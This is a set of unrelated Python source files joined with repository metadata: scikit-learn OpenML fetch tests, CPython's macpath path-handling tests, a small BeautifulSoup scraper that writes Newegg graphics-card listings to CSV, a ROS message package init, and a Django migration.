[True, False]) def test_fetch_openml_iris_multitarget(monkeypatch, gzip_response): # classification dataset with numeric only columns data_id = 61 data_name = 'iris' data_version = 1 target_column = ['sepallength', 'sepalwidth'] expected_observations = 150 expected_features = 3 expected_missing = 0 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, np.float64, np.float64, expect_sparse=False, compare_default_target=False) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_anneal(monkeypatch, gzip_response): # classification dataset with numeric and categorical columns data_id = 2 data_name = 'anneal' data_version = 1 target_column = 'class' # Not all original instances included for space reasons expected_observations = 11 expected_features = 38 expected_missing = 267 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, np.float64, object, expect_sparse=False, compare_default_target=True) def test_decode_anneal(monkeypatch): data_id = 2 _monkey_patch_webbased_functions(monkeypatch, data_id, False) _test_features_list(data_id) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_anneal_multitarget(monkeypatch, gzip_response): # classification dataset with numeric and categorical columns data_id = 2 data_name = 'anneal' data_version = 1 target_column = ['class', 'product-type', 'shape'] # Not all original instances included for space reasons expected_observations = 11 expected_features = 36 expected_missing = 267 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, np.float64, object, expect_sparse=False, compare_default_target=False) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_cpu(monkeypatch, gzip_response): # regression dataset with numeric and categorical columns data_id = 561 data_name = 'cpu' data_version = 1 target_column = 'class' expected_observations = 209 expected_features = 7 expected_missing = 0 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, np.float64, np.float64, expect_sparse=False, compare_default_target=True) def test_decode_cpu(monkeypatch): data_id = 561 _monkey_patch_webbased_functions(monkeypatch, data_id, False) _test_features_list(data_id) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_australian(monkeypatch, gzip_response): # sparse dataset # Australian is the only sparse dataset that is reasonably small # as it is inactive, we need to catch the warning. Due to mocking # framework, it is not deactivated in our tests data_id = 292 data_name = 'Australian' data_version = 1 target_column = 'Y' # Not all original instances included for space reasons expected_observations = 85 expected_features = 14 expected_missing = 0 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) assert_warns_message( UserWarning, "Version 1 of dataset Australian is inactive,", _fetch_dataset_from_openml, **{'data_id': data_id, 'data_name': data_name, 'data_version': data_version, 'target_column': target_column, 'expected_observations': expected_observations, 'expected_features': expected_features, 'expected_missing': expected_missing, 'expect_sparse': True, 'expected_data_dtype': np.float64, 'expected_target_dtype': object, 'compare_default_target': False} # nump specific check ) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_adultcensus(monkeypatch, gzip_response): # Check because of the numeric row attribute (issue #12329) data_id = 1119 data_name = 'adult-census' data_version = 1 target_column = 'class' # Not all original instances included for space reasons expected_observations = 10 expected_features = 14 expected_missing = 0 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, np.float64, object, expect_sparse=False, compare_default_target=True) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_miceprotein(monkeypatch, gzip_response): # JvR: very important check, as this dataset defined several row ids # and ignore attributes. Note that data_features json has 82 attributes, # and row id (1), ignore attributes (3) have been removed (and target is # stored in data.target) data_id = 40966 data_name = 'MiceProtein' data_version = 4 target_column = 'class' # Not all original instances included for space reasons expected_observations = 7 expected_features = 77 expected_missing = 7 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, np.float64, object, expect_sparse=False, compare_default_target=True) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_emotions(monkeypatch, gzip_response): # classification dataset with multiple targets (natively) data_id = 40589 data_name = 'emotions' data_version = 3 target_column = ['amazed.suprised', 'happy.pleased', 'relaxing.calm', 'quiet.still', 'sad.lonely', 'angry.aggresive'] expected_observations = 13 expected_features = 72 expected_missing = 0 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) _fetch_dataset_from_openml(data_id, data_name, data_version, target_column, expected_observations, expected_features, expected_missing, np.float64, object, expect_sparse=False, compare_default_target=True) def test_decode_emotions(monkeypatch): data_id = 40589 _monkey_patch_webbased_functions(monkeypatch, data_id, False) _test_features_list(data_id) @pytest.mark.parametrize('gzip_response', [True, False]) def test_open_openml_url_cache(monkeypatch, gzip_response, tmpdir): data_id = 61 _monkey_patch_webbased_functions( monkeypatch, data_id, gzip_response) openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id) cache_directory = str(tmpdir.mkdir('scikit_learn_data')) # first fill the cache response1 = _open_openml_url(openml_path, cache_directory) # assert file exists location = _get_local_path(openml_path, cache_directory) assert os.path.isfile(location) # redownload, to utilize cache response2 = _open_openml_url(openml_path, cache_directory) assert response1.read() == response2.read() @pytest.mark.parametrize('gzip_response', [True, False]) @pytest.mark.parametrize('write_to_disk', [True, False]) def test_open_openml_url_unlinks_local_path( monkeypatch, gzip_response, tmpdir, write_to_disk): data_id = 61 openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id) cache_directory = str(tmpdir.mkdir('scikit_learn_data')) location = _get_local_path(openml_path, cache_directory) def _mock_urlopen(request): if write_to_disk: with open(location, "w") as f: f.write("") raise ValueError("Invalid request") monkeypatch.setattr(sklearn.datasets._openml, 'urlopen', _mock_urlopen) with pytest.raises(ValueError, match="Invalid request"): _open_openml_url(openml_path, cache_directory) assert not os.path.exists(location) def test_retry_with_clean_cache(tmpdir): data_id = 61 openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id) cache_directory = str(tmpdir.mkdir('scikit_learn_data')) location = _get_local_path(openml_path, cache_directory) os.makedirs(os.path.dirname(location)) with open(location, 'w') as f: f.write("") @_retry_with_clean_cache(openml_path, cache_directory) def _load_data(): # The first call will raise an error since location exists if os.path.exists(location): raise Exception("File exist!") return 1 warn_msg = "Invalid cache, redownloading file" with pytest.warns(RuntimeWarning, match=warn_msg): result = _load_data() assert result == 1 def test_retry_with_clean_cache_http_error(tmpdir): data_id = 61 openml_path = sklearn.datasets._openml._DATA_FILE.format(data_id) cache_directory = str(tmpdir.mkdir('scikit_learn_data')) @_retry_with_clean_cache(openml_path, cache_directory) def _load_data(): raise HTTPError(url=None, code=412, msg='Simulated mock error', hdrs=None, fp=None) error_msg = "Simulated mock error" with pytest.raises(HTTPError, match=error_msg): _load_data() @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_cache(monkeypatch, gzip_response, tmpdir): def _mock_urlopen_raise(request): raise ValueError('This mechanism intends to test correct cache' 'handling. As such, urlopen should never be ' 'accessed. URL: %s' % request.get_full_url()) data_id = 2 cache_directory = str(tmpdir.mkdir('scikit_learn_data')) _monkey_patch_webbased_functions( monkeypatch, data_id, gzip_response) X_fetched, y_fetched = fetch_openml(data_id=data_id, cache=True, data_home=cache_directory, return_X_y=True) monkeypatch.setattr(sklearn.datasets._openml, 'urlopen', _mock_urlopen_raise) X_cached, y_cached = fetch_openml(data_id=data_id, cache=True, data_home=cache_directory, return_X_y=True) np.testing.assert_array_equal(X_fetched, X_cached) np.testing.assert_array_equal(y_fetched, y_cached) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_notarget(monkeypatch, gzip_response): data_id = 61 target_column = None expected_observations = 150 expected_features = 5 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) data = fetch_openml(data_id=data_id, target_column=target_column, cache=False) assert data.data.shape == (expected_observations, expected_features) assert data.target is None @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_inactive(monkeypatch, gzip_response): # fetch inactive dataset by id data_id = 40675 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) glas2 = assert_warns_message( UserWarning, "Version 1 of dataset glass2 is inactive,", fetch_openml, data_id=data_id, cache=False) # fetch inactive dataset by name and version assert glas2.data.shape == (163, 9) glas2_by_version = assert_warns_message( UserWarning, "Version 1 of dataset glass2 is inactive,", fetch_openml, data_id=None, name="glass2", version=1, cache=False) assert int(glas2_by_version.details['id']) == data_id @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_nonexiting(monkeypatch, gzip_response): # there is no active version of glass2 data_id = 40675 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) # Note that we only want to search by name (not data id) assert_raise_message(ValueError, "No active dataset glass2 found", fetch_openml, name='glass2', cache=False) @pytest.mark.parametrize('gzip_response', [True, False]) def test_raises_illegal_multitarget(monkeypatch, gzip_response): data_id = 61 targets = ['sepalwidth', 'class'] _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) # Note that we only want to search by name (not data id) assert_raise_message(ValueError, "Can only handle homogeneous multi-target datasets,", fetch_openml, data_id=data_id, target_column=targets, cache=False) @pytest.mark.parametrize('gzip_response', [True, False]) def test_warn_ignore_attribute(monkeypatch, gzip_response): data_id = 40966 expected_row_id_msg = "target_column={} has flag is_row_identifier." expected_ignore_msg = "target_column={} has flag is_ignore." _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) # single column test assert_warns_message(UserWarning, expected_row_id_msg.format('MouseID'), fetch_openml, data_id=data_id, target_column='MouseID', cache=False) assert_warns_message(UserWarning, expected_ignore_msg.format('Genotype'), fetch_openml, data_id=data_id, target_column='Genotype', cache=False) # multi column test assert_warns_message(UserWarning, expected_row_id_msg.format('MouseID'), fetch_openml, data_id=data_id, target_column=['MouseID', 'class'], cache=False) assert_warns_message(UserWarning, expected_ignore_msg.format('Genotype'), fetch_openml, data_id=data_id, target_column=['Genotype', 'class'], cache=False) @pytest.mark.parametrize('gzip_response', [True, False]) def test_string_attribute_without_dataframe(monkeypatch, gzip_response): data_id = 40945 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) # single column test assert_raise_message(ValueError, ('STRING attributes are not supported for ' 'array representation. Try as_frame=True'), fetch_openml, data_id=data_id, cache=False) @pytest.mark.parametrize('gzip_response', [True, False]) def test_dataset_with_openml_error(monkeypatch, gzip_response): data_id = 1 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) assert_warns_message( UserWarning, "OpenML registered a problem with the dataset. It might be unusable. " "Error:", fetch_openml, data_id=data_id, cache=False ) @pytest.mark.parametrize('gzip_response', [True, False]) def test_dataset_with_openml_warning(monkeypatch, gzip_response): data_id = 3 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) assert_warns_message( UserWarning, "OpenML raised a warning on the dataset. It might be unusable. " "Warning:", fetch_openml, data_id=data_id, cache=False ) @pytest.mark.parametrize('gzip_response', [True, False]) def test_illegal_column(monkeypatch, gzip_response): data_id = 61 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) assert_raise_message(KeyError, "Could not find target_column=", fetch_openml, data_id=data_id, target_column='undefined', cache=False) assert_raise_message(KeyError, "Could not find target_column=", fetch_openml, data_id=data_id, target_column=['undefined', 'class'], cache=False) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_raises_missing_values_target(monkeypatch, gzip_response): data_id = 2 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) assert_raise_message(ValueError, "Target column ", fetch_openml, data_id=data_id, target_column='family') def test_fetch_openml_raises_illegal_argument(): assert_raise_message(ValueError, "Dataset data_id=", fetch_openml, data_id=-1, name="name") assert_raise_message(ValueError, "Dataset data_id=", fetch_openml, data_id=-1, name=None, version="version") assert_raise_message(ValueError, "Dataset data_id=", fetch_openml, data_id=-1, name="name", version="version") assert_raise_message(ValueError, "Neither name nor data_id are provided. " "Please provide name or data_id.", fetch_openml) @pytest.mark.parametrize('gzip_response', [True, False]) def test_fetch_openml_with_ignored_feature(monkeypatch, gzip_response): # Regression test for #14340 # 62 is the ID of the ZOO dataset data_id = 62 _monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response) dataset = sklearn.datasets.fetch_openml(data_id=data_id, cache=False) assert dataset is not None # The dataset has 17 features, including 1 ignored (animal), # so we assert that we don't have the ignored feature in the final Bunch assert dataset['data'].shape == (101, 16) assert 'animal' not in dataset['feature_names']
4f17b9642923971d36bd340e30cf3088aa9e4934
55540f3e86f1d5d86ef6b5d295a63518e274efe3
/toolchain/riscv/MSYS/python/Lib/test/test_macpath.py
09609c89ed3cbbeca84d8e94c33db3bb69321b4a
[ "bzip2-1.0.6", "LicenseRef-scancode-proprietary-license", "OpenSSL", "Python-2.0", "LicenseRef-scancode-newlib-historical", "TCL", "LicenseRef-scancode-warranty-disclaimer", "Apache-2.0" ]
permissive
bouffalolab/bl_iot_sdk
bc5eaf036b70f8c65dd389439062b169f8d09daa
b90664de0bd4c1897a9f1f5d9e360a9631d38b34
refs/heads/master
2023-08-31T03:38:03.369853
2023-08-16T08:50:33
2023-08-18T09:13:27
307,347,250
244
101
Apache-2.0
2023-08-28T06:29:02
2020-10-26T11:16:30
C
UTF-8
Python
false
false
6,503
py
from test import test_genericpath import unittest import warnings with warnings.catch_warnings(): warnings.filterwarnings("ignore", "the macpath module is deprecated", DeprecationWarning) import macpath class MacPathTestCase(unittest.TestCase): def test_abspath(self): self.assertEqual(macpath.abspath("xx:yy"), "xx:yy") def test_isabs(self): isabs = macpath.isabs self.assertTrue(isabs("xx:yy")) self.assertTrue(isabs("xx:yy:")) self.assertTrue(isabs("xx:")) self.assertFalse(isabs("foo")) self.assertFalse(isabs(":foo")) self.assertFalse(isabs(":foo:bar")) self.assertFalse(isabs(":foo:bar:")) self.assertTrue(isabs(b"xx:yy")) self.assertTrue(isabs(b"xx:yy:")) self.assertTrue(isabs(b"xx:")) self.assertFalse(isabs(b"foo")) self.assertFalse(isabs(b":foo")) self.assertFalse(isabs(b":foo:bar")) self.assertFalse(isabs(b":foo:bar:")) def test_split(self): split = macpath.split self.assertEqual(split("foo:bar"), ('foo:', 'bar')) self.assertEqual(split("conky:mountpoint:foo:bar"), ('conky:mountpoint:foo', 'bar')) self.assertEqual(split(":"), ('', '')) self.assertEqual(split(":conky:mountpoint:"), (':conky:mountpoint', '')) self.assertEqual(split(b"foo:bar"), (b'foo:', b'bar')) self.assertEqual(split(b"conky:mountpoint:foo:bar"), (b'conky:mountpoint:foo', b'bar')) self.assertEqual(split(b":"), (b'', b'')) self.assertEqual(split(b":conky:mountpoint:"), (b':conky:mountpoint', b'')) def test_join(self): join = macpath.join self.assertEqual(join('a', 'b'), ':a:b') self.assertEqual(join(':a', 'b'), ':a:b') self.assertEqual(join(':a:', 'b'), ':a:b') self.assertEqual(join(':a::', 'b'), ':a::b') self.assertEqual(join(':a', '::b'), ':a::b') self.assertEqual(join('a', ':'), ':a:') self.assertEqual(join('a:', ':'), 'a:') self.assertEqual(join('a', ''), ':a:') self.assertEqual(join('a:', ''), 'a:') self.assertEqual(join('', ''), '') self.assertEqual(join('', 'a:b'), 'a:b') self.assertEqual(join('', 'a', 'b'), ':a:b') self.assertEqual(join('a:b', 'c'), 'a:b:c') self.assertEqual(join('a:b', ':c'), 'a:b:c') self.assertEqual(join('a', ':b', ':c'), ':a:b:c') self.assertEqual(join('a', 'b:'), 'b:') self.assertEqual(join('a:', 'b:'), 'b:') self.assertEqual(join(b'a', b'b'), b':a:b') self.assertEqual(join(b':a', b'b'), b':a:b') self.assertEqual(join(b':a:', b'b'), b':a:b') self.assertEqual(join(b':a::', b'b'), b':a::b') self.assertEqual(join(b':a', b'::b'), b':a::b') self.assertEqual(join(b'a', b':'), b':a:') self.assertEqual(join(b'a:', b':'), b'a:') self.assertEqual(join(b'a', b''), b':a:') self.assertEqual(join(b'a:', b''), b'a:') self.assertEqual(join(b'', b''), b'') self.assertEqual(join(b'', b'a:b'), b'a:b') self.assertEqual(join(b'', b'a', b'b'), b':a:b') self.assertEqual(join(b'a:b', b'c'), b'a:b:c') self.assertEqual(join(b'a:b', b':c'), b'a:b:c') self.assertEqual(join(b'a', b':b', b':c'), b':a:b:c') self.assertEqual(join(b'a', b'b:'), b'b:') self.assertEqual(join(b'a:', b'b:'), b'b:') def test_splitext(self): splitext = macpath.splitext self.assertEqual(splitext(":foo.ext"), (':foo', '.ext')) self.assertEqual(splitext("foo:foo.ext"), ('foo:foo', '.ext')) self.assertEqual(splitext(".ext"), ('.ext', '')) self.assertEqual(splitext("foo.ext:foo"), ('foo.ext:foo', '')) self.assertEqual(splitext(":foo.ext:"), (':foo.ext:', '')) self.assertEqual(splitext(""), ('', '')) self.assertEqual(splitext("foo.bar.ext"), ('foo.bar', '.ext')) self.assertEqual(splitext(b":foo.ext"), (b':foo', b'.ext')) self.assertEqual(splitext(b"foo:foo.ext"), (b'foo:foo', b'.ext')) self.assertEqual(splitext(b".ext"), (b'.ext', b'')) self.assertEqual(splitext(b"foo.ext:foo"), (b'foo.ext:foo', b'')) self.assertEqual(splitext(b":foo.ext:"), (b':foo.ext:', b'')) self.assertEqual(splitext(b""), (b'', b'')) self.assertEqual(splitext(b"foo.bar.ext"), (b'foo.bar', b'.ext')) def test_ismount(self): ismount = macpath.ismount self.assertEqual(ismount("a:"), True) self.assertEqual(ismount("a:b"), False) self.assertEqual(ismount("a:b:"), True) self.assertEqual(ismount(""), False) self.assertEqual(ismount(":"), False) self.assertEqual(ismount(b"a:"), True) self.assertEqual(ismount(b"a:b"), False) self.assertEqual(ismount(b"a:b:"), True) self.assertEqual(ismount(b""), False) self.assertEqual(ismount(b":"), False) def test_normpath(self): normpath = macpath.normpath self.assertEqual(normpath("a:b"), "a:b") self.assertEqual(normpath("a"), ":a") self.assertEqual(normpath("a:b::c"), "a:c") self.assertEqual(normpath("a:b:c:::d"), "a:d") self.assertRaises(macpath.norm_error, normpath, "a::b") self.assertRaises(macpath.norm_error, normpath, "a:b:::c") self.assertEqual(normpath(":"), ":") self.assertEqual(normpath("a:"), "a:") self.assertEqual(normpath("a:b:"), "a:b") self.assertEqual(normpath(b"a:b"), b"a:b") self.assertEqual(normpath(b"a"), b":a") self.assertEqual(normpath(b"a:b::c"), b"a:c") self.assertEqual(normpath(b"a:b:c:::d"), b"a:d") self.assertRaises(macpath.norm_error, normpath, b"a::b") self.assertRaises(macpath.norm_error, normpath, b"a:b:::c") self.assertEqual(normpath(b":"), b":") self.assertEqual(normpath(b"a:"), b"a:") self.assertEqual(normpath(b"a:b:"), b"a:b") class MacCommonTest(test_genericpath.CommonTest, unittest.TestCase): pathmodule = macpath test_relpath_errors = None if __name__ == "__main__": unittest.main()
7cfa8bc5f3f464ee75f8482cc31e6b0550228649
f73241e87cef9250d8e6a3648b23920dddccb19f
/Web Scrape.py
85c7f9f0bceec54ec321a0cabcdd18b23c736d6e
[]
no_license
roshanpokhrel/webscrape
cf39c6826913c2e01490797e3a48943574eddcaf
23f3e07b14bbd6ea5ee1b8d5f21e4a7b7b7b1657
refs/heads/master
2020-03-25T17:17:05.148421
2018-08-08T06:36:22
2018-08-08T06:36:22
143,971,587
0
0
null
null
null
null
UTF-8
Python
false
false
1,370
py
from urllib.request import urlopen as uReq from bs4 import BeautifulSoup as soup my_url = 'https://www.newegg.com/Video-Cards-Video-Devices/Category/ID-38?Tpk=graphics%20card' # opening up a connection, grabbing the page uClient = uReq(my_url) # offloads contents into variable page_html = uClient.read() # close the connection uClient.close() # html parsing page_soup = soup(page_html, "html.parser") # print(page_soup.h1) # print(page_soup.p) # print(page_soup.body) # Find all div that have the class item-container containers = page_soup.findAll("div", {"class":"item-container"}) #print(len(container)) #print(container[0]) # Open a csv file to write to filename = "products_name.csv" f = open(filename, "w") headers = "brand, product_name, shipping\n" f.write(headers) for container in containers: brand = container.div.div.a.img["title"] #Who makes this graphics card title_container = container.findAll("a", {"class":"item-title"}) product_name = title_container[0].text shipping_container = container.findAll("li", {"class": "price-ship"}) shipping = shipping_container[0].text.strip() #strip to cut all whitespaces and other characters f.write(brand + ',' + product_name.replace(",", "|") + ',' + shipping + '\n') # print("My brand is:" + brand) # print("My Product is:" + product_name) # print("My shipping detail is:" + shipping) f.close()
bdd85e097c2d83b1fa81fe61ddc8d6a2508d83d0
fe9935b08e22fc019fbcfd6c0bc37ab235e2a0e2
/catkin_ws/devel/lib/python3/dist-packages/suruiha_gazebo_plugins/msg/__init__.py
47936db23aedbd75e93835ebb9ed84b9da5ba4b5
[]
no_license
abdussametkaradeniz/RosLessonsAndTutorials
ce22a06d8a881d949479956ea6aa06ff9f8bf41b
940597350f5ed85244696ec44fe567fd89a6d5d8
refs/heads/main
2023-07-18T22:56:52.075918
2021-09-07T21:42:24
2021-09-07T21:42:24
404,125,607
1
0
null
null
null
null
UTF-8
Python
false
false
140
py
from ._UAVBattery import * from ._UAVMessage import * from ._UAVScore import * from ._UAVSensorMessage import * from ._UAVTracking import *
ce0d6c9dabd06a703319e21717d1378c7980e8d9
9d35a44bd264258fc306c622e1097f637988638a
/shortnr/bookmarks/migrations/0004_auto_20160405_0334.py
3def50627d8aed2a9864fbaa008a26134ef36c2f
[]
no_license
D4VEB/urly-bird
fca75ea8888895b6a84dff73a931007af45de0e6
906de245acd5cd45883928ffb415791efbd32c01
refs/heads/master
2021-01-12T20:00:30.126945
2016-04-07T20:13:35
2016-04-07T20:13:35
55,182,743
0
0
null
2016-03-31T21:02:19
2016-03-31T21:02:19
null
UTF-8
Python
false
false
475
py
# -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-04-05 10:34 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('bookmarks', '0003_auto_20160405_0319'), ] operations = [ migrations.AlterField( model_name='bookmark', name='pub_date', field=models.DateTimeField(auto_now=True, db_index=True), ), ]